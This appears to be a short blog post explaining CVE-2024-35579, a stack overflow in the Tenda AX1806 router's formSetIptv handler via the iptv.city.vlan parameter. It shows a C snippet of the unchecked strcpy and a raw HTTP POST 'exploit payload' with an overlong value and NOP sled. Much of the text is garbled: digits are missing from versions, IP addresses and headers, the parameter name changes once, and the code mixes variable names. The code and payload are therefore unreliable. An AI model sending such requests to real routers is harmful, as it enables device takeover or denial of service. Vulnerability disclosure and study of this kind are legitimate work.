CVE-2024-35579 - Tenda AX1806 v1...1 Stack Overflow Vulnerability Exploit via iptv.city.vlan parameter in formSetIptv function
A new vulnerability named CVE-2024-35579 has been identified in the Tenda AX1806 routers with firmware v1...1. The vulnerability was discovered in the formSetIptv function and affects the iptv.city.vlan parameter. This flaw can lead to a stack overflow, eventually resulting in the execution of arbitrary code or a denial-of-service attack. This post will investigate the exploit details, provide original references, and a code snippet to demonstrate the vulnerability.
Exploit Details
The CVE-2024-35579 vulnerability can be triggered by an attacker who sends a specially crafted HTTP request to the formSetIptv function of a vulnerable Tenda AX1806 router, causing a stack overflow in the iptv.cbVLAN parameter. Attackers can leverage this vulnerability to execute arbitrary code or cause a denial-of-service (DoS) attack on the affected devices.
The root cause of the issue is a lack of proper input validation and an insufficient check on the buffer size. When processing the iptv.city.vlan parameter, the formSetIptv function does not ensure that the user-supplied input data is within the allowable bounds, resulting in a buffer overflow condition.
Below is a code snippet demonstrating the vulnerable part in the firmware
void formSetIptv(request *req, char *post_data)
{
...
char iptv_city_vlan[256];
...
// Get the iptv.city.vlan value submitted by the user
char *city_vlan = websGetVar(wp, "iptv.city.vlan", "");
...
// Copy the user-supplied data into the stack buffer without checking its size
strcpy(iptv_city_vlan, city_vlan);
...
}
An attacker can exploit this vulnerability by sending an HTTP request with a maliciously crafted iptv.city.vlan value, triggering the stack overflow condition.
Here is an example of a potential exploit payload
`
POST /goform/formSetIptv HTTP/1.1
Host: 192.168..1
User-Agent: Mozilla/5. (Windows NT 10.; Win64; x64; rv:89.) Gecko/20100101 Firefox/89.
Accept: text/html,application/xhtml+xml,application/xml;q=.9,image/webp,*/*;q=.8
Accept-Language: en-US,en;q=.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 297
Origin: http://192.168..1
DNT: 1
Connection: close
Referer: http://192.168..1/iptv.asp
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
iptv.city.vlan=A<...A...128 characters...>AAAAAAAA%00%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%
Timeline
Published on: 05/20/2024 18:15:10 UTC
Last modified on: 08/08/2024 15:35:12 UTC